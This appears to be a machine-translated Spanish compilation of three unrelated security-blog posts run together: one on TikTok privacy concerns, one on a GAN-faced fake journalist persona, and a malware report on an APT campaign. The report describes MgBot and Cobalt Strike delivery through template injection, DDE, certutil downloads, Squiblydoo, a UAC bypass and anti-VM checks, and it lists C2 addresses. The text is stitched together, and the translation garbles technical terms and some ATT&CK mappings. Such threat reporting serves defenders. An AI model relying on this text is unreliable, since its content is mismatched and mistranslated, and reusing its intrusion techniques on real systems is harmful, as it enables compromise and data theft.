En noticias recientes, el gigante minorista Amazon envió un memorando a los empleados diciéndoles que eliminen la popular aplicación de redes sociales TikTok de sus teléfonos. En el memorando decía que la aplicación representaría un riesgo de seguridad sin entrar en detalles. Más tarde, el memo fue retirado sin una explicación, excepto que se envió por error. ¿Ya tenemos curiosidad, mi querido Watson?

¿Qué es el TikTok?

Para aquellos de nosotros que no podemos distinguir una aplicación de redes sociales de otra, TikTok es una de las más populares y fue especialmente diseñada para permitir a los usuarios subir videos cortos para que otros les den me gusta y compartan. La funcionalidad ha crecido desde una aplicación básica de sincronización de labios para alojar una amplia variedad de videoclips cortos. Es predominantemente popular entre un público más joven. La mayoría de los usuarios tienen entre 13 y 24 años . En el primer trimestre de 2019, TikTok fue la aplicación más descargada en la App Store, con más de 33 millones de instalaciones. TikTok es propiedad de una compañía tecnológica china llamada ByteDance .

La nación declara la atención

Esta no fue la primera vez que TikTok se enfrentó a la eliminación de varios dispositivos. India ya prohibió TikTok. Y Estados Unidos y Australia también están considerando bloquear la aplicación. De hecho, en diciembre, el ejército de EE. UU. Prohibió a TikTok de sus teléfonos, y en marzo, los senadores de EE. UU. Propusieron un proyecto de ley que bloquearía a TikTok de todos los dispositivos gubernamentales.

¿Es seguro TikTok?

Para empezar, el hecho de que TikTok sea un producto chino no ayuda. Una serie de aplicaciones y paquetes de software chinos han sido investigados y se encontró que estaban «llamando a casa». Ahora bien, esto no significa que lo estén espiando automáticamente, pero cuando comienza su investigación con una expectativa negativa, se inclina a verlo como tal. Y recopilar información sobre un cliente sin su consentimiento está mal.

El hecho de que TikTok sea diferente en la propia China, donde se conoce con el nombre de Douyin, es otro factor. Pero esto podría explicarse, así como China tiene la reputación de espiar a su población. Entonces, tal vez la versión extranjera es menos intrusiva que la doméstica. Y algunos gobiernos tienen sus propias razones para no confiar en nada de origen chino u otra agenda para boicotear productos originarios de China.

Agregando a la sospecha que un usuario de Reddit por el mango de bangorlol publicó comentarios sobre los datos encontrados para ser enviados a casa cuando realizó la ingeniería inversa de la aplicación. El mismo usuario ha iniciado un hilo en reddit donde desea cooperar con otros ingenieros de ingeniería inversa en las versiones más recientes de la aplicación. Un tipo de comportamiento que fue confirmado por otra fuente es que la aplicación copia información del portapapeles. Lo que sin duda es algo que va más allá de lo que hacen otras aplicaciones de redes sociales.

La defensa de TikTok

La defensa principal de TikTok consiste en el hecho de que la mayoría de su personal superior está fuera de China. En su blog también especificaron dónde se almacenan sus datos y que los datos no están sujetos a la ley china.

“TikTok está liderado por un CEO estadounidense, con cientos de empleados y líderes clave en materia de seguridad, productos y políticas públicas aquí en los Estados Unidos. Nunca hemos proporcionado datos de usuarios al gobierno chino, ni lo haríamos si nos lo pidieran «.

Opciones para prohibir completamente TikTok

Además de organizaciones como Wells Fargo y algunas ramas del ejército de los EE. UU. Que piden a sus empleados que se abstengan de usar la aplicación en dispositivos que también contienen datos sobre la organización, también hemos visto países que abogan por la prohibición total de la aplicación. Pero este no es un objetivo fácil de alcanzar y también podría resultar ineficaz.

Para una prohibición total de una aplicación, debería eliminarla de las tiendas oficiales. Esto es más difícil de lograr para algunos países que para otros. India prohibió TikTok junto con otras 58 aplicaciones chinas. El gobierno de los EE. UU. Tendría que encontrar una razón legal sólida para solicitar que Apple y Google retiren TikTok de sus tiendas de aplicaciones y probablemente se encontrarán con mucha resistencia.

Además, si la gente quiere instalar una aplicación popular como TikTok, hay muchas otras fuentes. Las descargas no se limitan a las tiendas de juegos oficiales, por lo que un usuario determinado podrá encontrar la aplicación en otro lugar. Y no impide que los millones de usuarios activos sigan utilizando la aplicación.

Otra opción es darle a TikTok el mismo tratamiento que le fue entregado a Huawei. Póngalos en la lista de entidades de los Departamentos de Comercio, lo que les negaría el acceso a la tecnología estadounidense. Dadas las circunstancias que no logran mucho más que negarles el acceso a las tiendas de juegos con las mismas consecuencias que discutimos anteriormente.

Redes sociales y privacidad

Hemos advertido muchas veces que no publiquemos información sensible a la privacidad en las redes sociales y que lo guiemos a usted y a sus hijos a usar las redes sociales de manera segura . Incluso publicamos una guía para aquellos que querían eliminarse de las principales redes sociales .

Pero cuando la aplicación de redes sociales está decidida a extraer sus datos, se convierte en una historia completamente diferente. No hemos visto pruebas concluyentes de que esto sea cierto para TikTok, pero algunas de las acusaciones son muy serias y parecen estar respaldadas por hechos e investigaciones autorizadas.

Otros analistas descartaron los hallazgos de los investigadores como conclusiones rápidas. Una cosa es segura: un análisis completo sin la ayuda de los desarrolladores requerirá mucho esfuerzo y tiempo e incluso entonces, los resultados pueden ser discutibles. En este punto, no podemos estar seguros de si la aplicación TikTok está espiando a sus usuarios de una manera que va más allá de lo que podríamos esperar de una aplicación de redes sociales ordinaria.

Todo lo que podemos hacer en este momento es informar a nuestros usuarios sobre la discusión en curso y tal vez explicar algunos de los puntos que se están planteando. También sentimos la necesidad de repetir nuestras advertencias sobre la difícil relación entre las redes sociales y la privacidad. Obviamente, si surge algún hecho concreto, lo mantendremos informado.

Las falsificaciones subversivas que entran en la fiesta sin previo aviso, hacen lo suyo, y luego se escabullen en la noche sin que nadie se dé cuenta de dónde está. Los clips fácilmente desacreditados de Donald Trump gritando LOS NUKES ESTÁN ARRIBA o algo igualmente ridículo no son una preocupación importante. Ya hemos investigado por qué ese es el caso .

Lo que también hemos explorado son las formas centradas en las personas con las que puede entrenar su ojo para detectar defectos y errores sobresalientes en imágenes falsas profundas , esencialmente, GANS (redes de confrontación generativas) que salió mal. Por lo general, habrá algo un poco fuera de los detalles, y depende de nosotros descubrirlo.

También se están haciendo progresos en el ámbito de la verificación digital de fraude, con algunas técnicas ingeniosas disponibles para ver qué es real y qué no. Resulta que hay una historia en las noticias que combina la subversión, el ojo humano e incluso una salpicadura de examen automatizado en buena medida.

Una carta falsa al editor

Un muchacho joven, «Oliver Taylor», que estudiaba en la Universidad de Birmingham, se encontró con editoriales publicados en las principales fuentes de noticias como Time of Israel y Jerusalem Post, con su «carrera» de escritura aparentemente  cobrando vida a fines de 2019 , con artículos adicionales en varios lugares a lo largo de 2020.

Después de una corriente de estas piezas, todo explotó en abril cuando un nuevo artículo de «Taylor» aterrizó haciendo algunas acusaciones bastante fuertes contra un par de académicos del Reino Unido.

Después de las inevitables consecuencias, resultó que Oliver Taylor no estaba estudiando en la Universidad de Birmingham . De hecho, aparentemente no era real y casi todos los rastros en línea del autor desaparecieron en el éter. Su número de teléfono móvil era inalcanzable, y nada regresó de su dirección de correo electrónico.

Aún más curiosamente, su fotografía tenía todas las características de una falsificación profunda (o, controvertidamente, no una «falsificación profunda»; más sobre el creciente choque sobre nombres descriptivos más adelante). Independientemente de lo que pretendes clasificar como el rostro ficticio de este hombre, en términos simples, es una imagen generada por IA diseñada para parecer lo más real posible.

¿Alguien había creado una construcción virtual y aprovechó su tiempo con una serie de publicaciones de blog que de otro modo no serían notables simplemente para establecerse en las principales plataformas antes de abandonar lo que parece ser una publicación de rencor?

Fingir para hacerlo

No se equivoquen, las entidades falsas que presionan opiniones influyentes son definitivamente una cosa. Las organizaciones de noticias derechas se han topado recientemente con un problema de este tipo . No hace mucho tiempo, Facebook eliminó unas asombrosas 700 páginas con 55 millones de seguidores en una colosal explosión de desinformación impulsada por la IA denominada » Enjambre de cara falsa «. Esta gran parte de la actividad de estilo Borg hizo pleno uso de las falsificaciones profundas y otras tácticas para impulsar consistentemente los mensajes políticos con un fuerte apoyo anti-China.

Lo que nos lleva de vuelta a nuestro estudiante solitario, con su colección de artículos bajo el radar, que culmina en un ataque directo contra académicos confundidos. El punto final, las travesuras políticas de 700 páginas y una tormenta de gente falsa, podría ser fácilmente puesto en marcha por un valiente humano falso con un sueño y una misión para causar agravación a otros.

¿Cómo determinó la gente que no era real?

Tech avanza hasta el plato

Algunas sospechas, y las personas adecuadas con la tecnología adecuada en la mano, es cómo lo hicieron. Hay muchas cosas que puede hacer para eliminar imágenes falsas, y hay una gran sección en Reuters que lo guía a través de las diversas etapas de detección. Los usuarios ya no tienen que elegir manualmente los defectos; La tecnología (por ejemplo) aislará la cabeza del fondo, haciendo que sea más fácil ver fallas distorsionadas con frecuencia. O tal vez podamos usar mapas de calor generados por algoritmos para resaltar las áreas más sospechosas de interferencia digital.

Aún mejor, hay herramientas disponibles que le darán un resumen de lo que sucede con una imagen.

Cavando en la tierra

Si edita muchas fotografías en su PC, probablemente esté familiarizado con los metadatos EXIF. Esta es una combinación de muchos bits de información en el momento en que se toma la foto. Tipo de cámara / teléfono, lente, GPS, detalles de color: el cielo es el límite. Por otro lado, algunos de ellos, como los datos de ubicación, pueden ser potencialmente una amenaza a la privacidad, por lo que es bueno saber cómo eliminarlos si es necesario.

Como con la mayoría de las cosas, realmente depende de lo que quieras de él. Las imágenes generadas por IA a menudo no son diferentes.

Hay muchas formas de unir sus imágenes GAN. Esto deja rastros, a menos que intentes ofuscarlo o de alguna manera eliminar alguna información. Hay formas de profundizar en la parte inferior de una imagen GAN y obtener resultados útiles.

Deslizamiento de imagen: a menudo una idea de último momento

En noviembre de 2019, pensé que sería divertido si los creadores de «Katie Jones» simplemente hubieran deslizado perezosamente una imagen de un sitio web de generación de rostros, en lugar de agonizar por los detalles de la imagen falsa.

Para nuestro estudiante universitario ficticio, parece que las personas detrás de él pueden haber hecho exactamente eso [ 1 ], [ 2 ]. El creador del sitio del que probablemente se extrajo la imagen ha dicho que están tratando de hacer que sus imágenes ya no se puedan descargar, y / o colocar las cabezas de las personas frente a un fondo falso identificable al 100 por ciento como el «espacio». También afirman que «los verdaderos malos actores alcanzarán soluciones más sofisticadas», pero como hemos visto en dos casos de alto perfil, los malos actores con grandes plataformas y alcance influyente de hecho solo están tomando la imagen falsa que desean.

Esto probablemente se deba a que, en última instancia, la imagen es solo una ocurrencia tardía; la guinda de un pastel de propaganda abultado.

Solo rueda con eso

Como hemos visto, la imagen no fue hecha a medida para esta campaña. Casi con certeza no estaba en la vanguardia del plan para quien se le ocurrió, y no estaban planificando su esquema de dominación mundial comenzando con fotos de perfil falsas. Está justo allí, y necesitaban uno, y (parece), de hecho, simplemente tomaron uno de un sitio web de generación de rostros disponible gratuitamente. Podría haber sido fácilmente una imagen de modelo de stock robada, pero eso es, por supuesto, algo más fácil de rastrear. 

Y así, mis amigos, es cómo terminamos con otro uso más sutil de la tecnología sintética cuya presencia puede no haber importado tanto.

¿Son estos incluso deepfakes?

Una pregunta interesante, y una que parece aparecer cada vez que una cara generada por GAN se adjunta a travesuras dudosas o una estafa absoluta. Algunos dirían que una imagen estática, totalmente sintética, no es una falsificación profunda porque es un tipo de salida totalmente diferente.

Para desglosar esto:

1. El tipo más familiar de deepfake, donde terminas con un video de [estrella de cine] diciendo algo desconcertante o haciendo algo salaz, se produce al alimentar una herramienta con múltiples imágenes de esa persona. Esto empuja a la IA a hacer que la [estrella de cine] diga lo desconcertante, o realice acciones en un clip en el que de otro modo no existirían. Las falsificaciones pornográficas increíblemente comunes serían el mejor ejemplo de esto.
2. La imagen utilizada para «Oliver Taylor» es un tiro en la cabeza procedente de una GAN que se alimenta con muchas imágenes de personas reales, con el fin de juntar todo de una manera que escupe una imagen pasable de un humano 100 por ciento falso. Él es absolutamente la suma de sus partes, pero de una manera que ya no se parece a ellas.

Entonces, cuando la gente dice: «Eso no es falso», quieren mantener una división firme entre «imagen o clip falso basado en una persona, generado a partir de esa misma persona» versus «imagen o clip falso basado en varias personas, para crear una persona totalmente nueva «.

La otra marca negativa común establecida en contra de las falsificaciones profundas de imágenes GAN sintéticas es que las manipulaciones digitales no son las que la hacen efectiva. ¿Cómo puede ser una falsificación profunda si no fue muy bueno?

Llama a los testigos al stand.

Todos los puntos válidos, pero los contrapuntos también son convincentes.

Si vamos a descartar su derecho al estado de deepfake porque las manipulaciones digitales no son efectivas, entonces terminaremos con muy pocas falsificaciones de buena fe. Las manipulaciones digitales no lo hicieron efectivo, porque no era muy bueno. Del mismo modo, nunca sabríamos si las manipulaciones digitales no han sido buenas porque las extrañaríamos por completo, ya que vuelan por debajo del radar.

Incluso las mejores variantes basadas en películas tienden a contener cierto nivel de falta de exactitud, y todavía tengo que colocar un montón delante de mí donde no pude detectar al menos nueve de cada 10 falsificaciones de GAN mezcladas con fotos reales.

Por interesante e interesante que sea la tecnología, la producción sigue siendo en gran medida un poco desordenada. Por experiencia, la combinación de un ojo entrenado y algunas de las herramientas de detección que existen hacen que las ambiciones del falsificador sean breves. La idea es hacer lo suficiente para impulsar cualquier persona / intención ficticia adjunta a la imagen que esté por encima de la línea y hacerla plausible, ya sea blogs, artículos de noticias, artículos de opinión, publicaciones de trabajo falsas, lo que sea. La falsificación digital funciona mejor como un ruido extra en el fondo. Realmente no desea llamar la atención como parte de una operación más grande.

¿Es este término general una ayuda o un obstáculo?

En cuanto a mantener la etiqueta «deepfake» lejos de las personas falsas de GAN, aunque aprecio la diferencia en la salida de imágenes, no estoy 100 por ciento seguro de que esto sea necesariamente útil. La palabra deepfake es un acrónimo de «aprendizaje profundo» y «falso». Ya sea que termine con Nicolas Cage caminando en The Matrix, o si tiene una cara simulada obtenida de un sitio web de generación de imágenes, ambos son falsos de alguna forma de aprendizaje profundo.

El resultado final es el mismo: una cosa falsa que hace una cosa falsa, incluso si el camino tomado para llegar allí es diferente. Algunos argumentarían que esta es una división / eliminación potencialmente innecesaria e innecesaria de una definición general que logra aplicarse de manera útil y precisa a los dos escenarios anteriores, y sin duda a otros.

Sería interesante saber si hay un consenso en el espacio de análisis profundo de AI / creación de GAN / analista sobre esto. Desde mi propia experiencia hablando con personas en esta área, la bolsa de opiniones es tan variada como la calidad de los resultados de GAN. Quizás eso cambie en el futuro.

El futuro de la detección falsa

Le pregunté a Munira Mustaffa , analista de seguridad, si las técnicas de detección automatizadas superarían a simple vista para siempre:

He estado reflexionando sobre esta pregunta, y no estoy seguro de qué más podría agregar. Sí, creo que una verificación automática de falsificación profunda probablemente pueda hacer una mejor evaluación que el ojo humano eventualmente. Sin embargo, incluso si tiene la IA perfecta para detectarlos, siempre será necesaria la revisión humana. Creo que el contexto también es importante en términos de su pregunta. Si estamos detectando deepfakes, ¿contra qué estamos detectando?

Creo que también es importante reconocer que no existe una definición establecida de lo que es un falso falso. Algunos dirían que el término solo se aplica a audio / videos, mientras que las manipulaciones de fotos son «falsificaciones baratas». El lenguaje es crítico. Dejando a un lado la semántica, a lo sumo, la gente está jugando con deepfakes / cheapfakes para producir cosas tontas a través de FaceApp. Pero el problema aquí no es realmente sobre deepfakes / cheapfakes, sino que es la intención detrás del uso. Los usos anteriores han indicado cómo se han empleado los deepfakes para influir en la percepción, como el video ‘tonto’ de Nancy Pelosi.

Al final del día, no importa cuán sofisticado sea el software de detección si las personas no van a estar atentas para investigar a quién permiten su red o quién está influyendo en su punto de vista. Creo que la gente está demasiado enfocada en el concepto de que las aplicaciones de deepfakes son principalmente para porno de venganza y para influir en los votantes. Todavía tenemos que ver operaciones a gran escala empleándolos. Sin embargo, como nos demostró el caso reciente de Oliver Taylor, las aplicaciones deepfake / cheapfake van más allá de eso.

Existe un peligro potencial real de que un buen deepfake / cheapfake que esté correctamente respaldado pueda transformarse en un individuo creíble y persuasivo. Esto, por supuesto, plantea más preguntas preocupantes: ¿qué podemos hacer para mitigar esto sin sofocar las voces que ya están luchando por encontrar una plataforma?

Somos falsos en la luna

Estamos en un punto en el que se podría argumentar que los videos falsos son más interesantes conceptualmente que en ejecución. El Centro de Virtualidad Avanzada del MIT ha reunido una versión del discurso que se suponía que Richard Nixon pronunciaría si el alunizaje terminara en tragedia . Es absolutamente una cosa escalofriante mirar; sin embargo, el clip en sí no es el mejor técnicamente.

La cabeza no juega bien con las fuentes de luz a su alrededor, el escote de la camisa está mal contra la mandíbula y la voz tiene múltiples rarezas digitales en todo momento. Tampoco ayuda que usen su discurso de renuncia para el cuerpo, ya que uno tiene que preguntarse sobre la óptica de barajar papeles cuando anuncia que los astronautas han muerto horriblemente.

No, lo interesante para mí es decidir mostrar la naturaleza engañosa de los deepfakes utilizando un hombre que nació en 1913 y murió hace 26 años. ¿Alguien menor de 40 años recuerda su aspecto, el sonido de su voz fuera de la parodia y las películas lo suficientemente bien como para hacer una comparación? ¿O el punto es la disociación de una gran parte de la memoria colectiva? ¿Eso lo hace más efectivo o menos?

No estoy seguro, pero definitivamente agrega peso a la idea de que, por ahora, las falsificaciones profundas, ya sea video o imagen estática, son más efectivas como pequeños aspectos de las campañas de desinformación más grandes que las piezas de engaño digital que llaman la atención.

¿Nos vemos en tres meses?

Es inevitable que tengamos otra historia delante de nosotros lo suficientemente pronto, explicando cómo otra entidad fantasma ha preparado una identificación falsa el tiempo suficiente para dejar caer su carga útil o sembrar alguna discordia en los niveles más altos. Recuerde que las imágenes falsas son simplemente un pequeño trampolín hacia un objetivo general y no el objetivo final en sí mismo. Es un nuevo mundo valiente de interrupción, y tal vez para cuando levantes otra silla, incluso podría darte una convención de nomenclatura definitiva.

Esta publicación de blog fue escrita por Hossein Jazi y Jérôme Segura.

El 2 de julio, encontramos un archivo con un documento incrustado que pretendía ser del gobierno de la India. Este archivo utiliza la inyección de plantilla para eliminar una plantilla maliciosa que cargó una variante de Cobalt Strike.

Un día después, el mismo actor de amenazas cambió su plantilla y soltó un cargador llamado MgBot, ejecutando e inyectando su carga útil final mediante el uso del Servicio de Administración de Aplicaciones (AppMgmt) en Windows.

El 5 de julio, observamos otro archivo con un documento incrustado que tomó prestada una declaración sobre Hong Kong del primer ministro del Reino Unido, Boris Johnson. Este documento utilizó los mismos TTP para descartar y ejecutar la misma carga útil.

Considerando las continuas tensiones entre India y China, así como las nuevas leyes de seguridad sobre Hong Kong, creemos que esta nueva campaña es operada por un actor chino patrocinado por el estado. Según nuestro análisis, creemos que este puede ser un grupo APT chino que ha estado activo desde al menos 2014.

Target activo con diferentes señuelos

Pudimos rastrear las actividades relacionadas con estos actores de amenazas durante la sucesión de varios días basados ​​en intentos únicos de phishing diseñados para comprometer su objetivo.

‘Comprobación de seguridad del correo’ con Cobalt Strike (variante 1)

Esta campaña probablemente se llevó a cabo a través de correos electrónicos de spear phishing. El archivo .rar ( Mail security check.rar ) incluye un documento con el mismo nombre (Figura 1).

El documento utiliza la inyección de plantilla para descargar una plantilla remota desde la siguiente URL (Figura 2).

La plantilla descargada utiliza el protocolo de intercambio dinámico de datos (DDE) para ejecutar comandos maliciosos, que están codificados dentro del contenido del documento (Figura 3).

Después de la decodificación, podemos ver la lista de comandos que DDE ejecutará:

Como muestra la Figura 4, los actores de la amenaza usaron certutil con los parámetros -urlcache -split -f para descargar un scriptlet de su servidor y luego usaron la técnica Squiblydoo para ejecutar el scriptlet descargado a través de regsvr32.exe en la máquina víctima.

Este scriptlet se almacena en el directorio Documentos como «ff.sct». El scriptlet es un archivo XML que tiene incrustado VBscript (Figura 5).

El scriptlet crea una macro VB y llama a Excel para ejecutarlo. La macro se ha ofuscado para evitar el mecanismo de seguridad estático y es responsable de inyectar la carga útil integrada en rundll32.exe utilizando el método de inyección reflectante de DLL. La carga útil inyectada es una variante de Cobalt Strike.

El siguiente diagrama muestra el proceso general de este ataque:

‘Verificación de seguridad del correo’ con MgBot (variante 2)

Como mencionamos anteriormente, un día después del primer ataque, el grupo APT cambió su plantilla remota. En esta nueva variante, los actores dejaron de usar la técnica Squiblydoo y Cobalt Strike como carga útil.

La Figura 7 muestra los nuevos comandos codificados incrustados en el archivo de plantilla.

La Figura 8 muestra la lista de comandos que DDE ejecutará.

En este nuevo archivo de plantilla, el scriptlet storm.sct fue reemplazado por storm.txt . Similar a la versión anterior, certutil se utiliza para descargar el archivo storm.txt, que es un ejecutable almacenado en el directorio Documentos como ff.exe.

El siguiente diagrama muestra el proceso de ejecución general:

«Boris Johnson se compromete a admitir 3 millones de Hong Kong» con MgBot (variante 3)

El último documento utilizado por el grupo APT chino en esta campaña se centró en los problemas que ocurren en Hong Kong. El archivo fue incrustado dentro de un archivo llamado «Boris Johnson se compromete a admitir 3 millones desde Hong Kong a UKrar».

Este documento cita al primer ministro después de que China emitiera una nueva ley de seguridad contra Hong Kong (Figura 10).

Similar a los otros documentos, también utiliza la inyección de plantillas para descargar la plantilla remota (Figura 11).

La plantilla descargada (BNOHK.docx) es similar a ADIN.docx (variante 2) en la que usa DDE para descargar y soltar su cargador.

Análisis de carga útil: MgBot (BLame, Mgmbot)

El ejecutable eliminado (ff.exe) es una nueva variante de un cargador llamado MgBot que elimina y carga la carga útil final. Este cargador pretende ser una herramienta Realtek Audio Manager (Figura 12).

Tiene cuatro recursos integrados en los que dos de ellos están en chino simplificado. Este es un indicador que sugiere que esta campaña probablemente sea operada por un grupo APT chino.

El cargador comienza su proceso mediante la escalada de privilegios a través de un bypass UAC utilizando la interfaz COM CMSTPLUA .

MgBot utiliza varias técnicas anti-análisis y anti-virtualización. El código se auto modifica, lo que significa que altera sus secciones de código durante el tiempo de ejecución. Esto hace que el análisis estático de la muestra sea más difícil.

MgBot intenta evitar ejecutarse en entornos virtualizados conocidos como VmWare , Sandboxie y VirtualBox . Para identificar si se está ejecutando en uno de estos entornos, busca los siguientes archivos DLL: vmhgfs.dll , sbiedll.dll y vboxogl.dll y, si encuentra alguno de estos archivos DLL, pasa a un bucle infinito sin realizar ninguna actividad maliciosa. (Figura 14).

También verifica la presencia de productos de seguridad en la máquina de la víctima y toma un flujo de ejecución diferente si se detecta un producto de seguridad. Por ejemplo, comprueba zhudongfangyu.exe, 360sd.exe, 360Tray.exe, MfeAVSvc.exe y McUICnt.exe en diferentes partes del código (Figura 15). El malware no realiza todas las comprobaciones a la vez, sino que comprueba algunas de ellas en diferentes pasos de su ejecución.

Para invocar las API requeridas, el malware no las llama directamente, sino que crea una tabla de puntero de función para las API requeridas. Cada solicitud a una llamada API se realiza a través del acceso al índice relevante de esta tabla.

Como ejemplo, cuando el malware necesita invocar WinExec , lo invoca a través de su índice desde la tabla de punteros de función.

Después de compilar la tabla de llamadas API necesarias, el malware realiza los siguientes procedimientos:

• Se llama CreateFileW para crear iot7D6E.tmp (nombre aleatorio a partir de IOT) en el % Temp% APPDATA directorio. Este archivo tmp es un archivo cab que incorpora la carga útil final.
• Llama a WriteFile para llenar su contenido
• Llama a CreateProcessInternalW para invocar expand.exe para descomprimir el contenido de iot7D6E.tmp en ProgramData \ Microsoft \ PlayReady \ MSIBACF.tmp \ tmp.dat (el nombre del directorio MSIBACF.tmp se genera aleatoriamente y comienza con MSI y luego es seguido por un MSI combinación de números aleatorios y caracteres)

• Llama a CopyFileW para copiar tmp.dat en pMsrvd.dll
• Llama a DeleteFileW para eliminar tmp.dat
• Cae DBEngin.EXE y WUAUCTL.EXE en el Datos de programa \ Microsoft \ PlayReady directorio. Ambos archivos son rundll32.exe que se usa más tarde para ejecutar la DLL eliminada.
• Modifica la sección de registro de la ubicación de registro HKLM \ SYSTEM \ CurrentControlSet \ Services \ AppMgmt para hacerse persistente. Para realizar esta modificación, coloca dos archivos de registro llamados iix * .tmp (se han agregado números aleatorios a iix) en el directorio% APPDATA% Temp, que son las colmenas de registro antiguas y nuevas para la ubicación de registro mencionada.

Para cargar el archivo DLL caído ( pMsrvd.dll ), el cargador lo registra como un servicio. Para lograr esto, hace uso del servicio ya instalado, AppMgmt, para cargar la carga útil como se muestra en las siguientes imágenes:

Finalmente, ejecuta la DLL eliminada ejecutando net start AppMgmt . Después de cargar la DLL, el cargador crea un archivo cmd ( lgt * .tmp .cmd) en el directorio% APPDATA% TEMP con el contenido que se muestra en la Figura 20. Luego lo ejecuta para eliminar el archivo cmd y el cargador de la máquina de la víctima.

Pudimos identificar varias variantes diferentes de este cargador. En general, todas las variantes descartan la carga útil final usando expand.exe o extrac32.exe y luego usan «net start AppMgmt » o «net start StiSvc» para ejecutar la DLL caída con una de las siguientes configuraciones:

• svchost.exe -k netsvcs -p -s AppMgmt
• svchost.exe -k netsvcs
• svchost.exe -k imgsvc

La DLL eliminada es la carga principal utilizada por este actor de amenazas para realizar actividades maliciosas. A continuación se muestra la información de la versión del archivo que pretende ser una aplicación de Video Team Desktop.

El tiempo de creación de esta DLL parece ser «2008-04-26 16:41:12». Sin embargo, según los datos del encabezado Rich, podemos afirmar que el actor de la amenaza podría haber alterado esto.

La DLL tiene ocho funciones de exportación con nombres cuidadosamente seleccionados para fingir que están haciendo tareas normales. Puede verificar los servicios en ejecución y, en función de eso, puede inyectarse en el espacio de memoria de WmiPrvSE.exe.

Utiliza varias técnicas anti-depuración y anti-virtualización para detectar si se está ejecutando en un entorno virtualizado o si un depurador lo está depurando. Utiliza las llamadas API GetTickCount y QueryPerformanceCounter para detectar el entorno del depurador.

Para detectar si se está ejecutando en un entorno virtual, utiliza instrucciones de detección anti-vm como sldt y cpid que pueden proporcionar información sobre el procesador y también verifica los puertos Vmware IO (VMXH).

Todas las cadenas utilizadas por este RAT están ofuscadas o codificadas con XOR para dificultar su análisis.

Este último fragmento de código incluido en MgBot es un troyano de administración remota con varias capacidades como:

• Comunicación C2 sobre TCP (42.99.116 [.] 225: 12800)
• Posibilidad de tomar capturas de pantalla
• Keylogging
• Gestión de archivos y directorios.
• Gestión de proceso
• Crear MUTEX

Relaciones de infraestructura

A continuación se muestra la infraestructura utilizada por este APT y las relaciones entre los hosts utilizados por este grupo. Este grupo APT ha utilizado varias direcciones IP diferentes para alojar sus cargas maliciosas y también para sus comunicaciones C2.

Lo interesante es que la mayoría de las direcciones IP utilizadas por este APT se encuentran en Hong Kong y casi todas estas direcciones IP basadas en Hong Kong se utilizan para la comunicación C2. Incluso en sus campañas anteriores, en su mayoría han utilizado infraestructura en Hong Kong. El gráfico también muestra la relación entre las diferentes direcciones IP utilizadas por este grupo APT.

Android RAT

También encontramos varias aplicaciones maliciosas de Android que creemos que son parte del conjunto de herramientas utilizadas por este grupo APT. Malwarebytes los detecta como Android / Trojan.Spy.AndroRat.KSRemote .

Todas estas aplicaciones falsas contienen un archivo jar llamado ksremote.jar que proporciona la funcionalidad RAT:

• Pantalla de grabación y audio usando la cámara / micrófono del teléfono
• Localización de teléfono con coordenadas
• Robo de contactos telefónicos, registro de llamadas, SMS, historial web
• Enviar mensajes SMS

Esta RAT se comunica con los servidores de C&C utilizando números de puerto aleatorios dentro del rango 122.10.89.170 a 179 (todos en Hong Kong)

• 122.10.89 [.] 172: 10560
• 122.10.89 [.] 170: 9552
• 122.10.89 [.] 172: 10560

TTP en línea con los APT chinos

Los señuelos utilizados en esta campaña indican que el actor de la amenaza puede estar apuntando al gobierno indio y a las personas en Hong Kong, o al menos a quienes están en contra de la nueva ley de seguridad emitida por China.

Los TTP observados en estos ataques han sido utilizados por varios grupos chinos de APT:

• Se sabe que Rancor APT usa Certutil para descargar su carga útil
• Se sabe que KeyBoy usó DDE en sus campañas anteriores
• APT40 ha utilizado Squiblydoo e inyección de plantillas en sus campañas anteriores.

Teniendo en cuenta estos factores, atribuimos este ataque APT con moderada confianza a un nuevo grupo APT chino. Con base en los TTP utilizados por este grupo de APT, pudimos rastrear sus actividades al menos hasta 2014. En todas sus campañas, el actor ha utilizado una variante de MgBot.

Un actor de amenazas con una larga historia documentada

Una aguja en una publicación de blog del pajar de 2014 detalló una campaña que arroja un troyano disfrazado como una biblioteca legítima de codificadores de MP3. En esta campaña, el actor utilizó CVE-2012-0158 para soltar su troyano. El resto de los TTP, incluidos los métodos utilizados por el actor de la amenaza para ejecutar MgBot y las modificaciones del registro, son similares a esta campaña en curso.

En 2018, este grupo realizó otra operación en la que utilizaron una vulnerabilidad VBScript ( CVE-2018-8174) para iniciar su ataque para eliminar una variante de MgBot. En marzo de 2020, se envió un archivo de archivo ( warning.rar ) a VirusTotal que creemos que es parte de otra campaña utilizada por este actor.

Continuaremos las actividades de este grupo para ver si sus objetivos o técnicas evolucionan. Los usuarios de Malwarebytes están protegidos de esta campaña gracias a nuestra capa anti-exploit sin firma.

Técnicas MITRE ATT y CK

Táctica	CARNÉ DE IDENTIDAD	Nombre	Detalles
Ejecución	T1059	Interfaz de línea de comandos	Inicia CMD.EXE para la ejecución de comandos.
	T1106	Ejecución a través de carga de módulo	Cargas caídas o ejecutables reescritas – WUAUCTL.EXE – svchost.exe – rundll32.exe
	T1053	Rundll32	Utiliza RUNDLL32.EXE para cargar la biblioteca
	T1064	Scripting	WScript.exe: inicia MSHTA.EXE para abrir archivos HTA o HTMLS
	T1035	ejecución del servicio	Inicia NET.EXE para la gestión del servicio.
	T1170	mshta	Inicia MSHTA.EXE para abrir archivos HTA o HTMLS
	T1086	Potencia Shell	Ejecuta scripts de PowerShell
Escalada de privilegios	T1050	nuevo servicio	Crea o modifica servicios de Windows a través de rundll32.exe
	T1088	Bypass UAC	Ataque de escalada de privilegios conocido a través de DllHost.exe
Persistencia	T1031	Modificar servicio existente	Crea o modifica servicios de Windows a través de rundll32.exe
	T1050	nuevos servicios	Crea o modifica servicios de Windows a través de rundll32.exe
Evasión de defensa	T1107	Eliminación de archivos	Inicia CMD.EXE para borrarse automáticamente
	T1085	Rundll32	Utiliza RUNDLL32.EXE para cargar la biblioteca
	T1088	bypass UAC	Ataque de escalada de privilegios conocido a través de DllHost.exe
	T1497	Virtualización / Evasión de Sandbox	El cargador utiliza varias técnicas de detección anti-virtualización.
	T1221	Inyección de plantilla	Maldoc usa inyección de plantillas para descargar plantillas remotas
	T1218	Ejecución de proxy binario firmado	Use Squiblydoo para cargar el ejecutable
Descubrimiento	T1012	Registro de consultas	Lee el GUID de la máquina del registro
	T1082	Descubrimiento de información del sistema	Lee el GUID de la máquina del registro
	T1007	Descubrimiento de servicio del sistema	Inicia NET.EXE para la gestión del servicio.
Movimiento lateral	T1105	Copia remota de archivos	– certutil.exe: descarga archivos ejecutables de Internet – cmd.exe: inicia CertUtil para descargar archivos
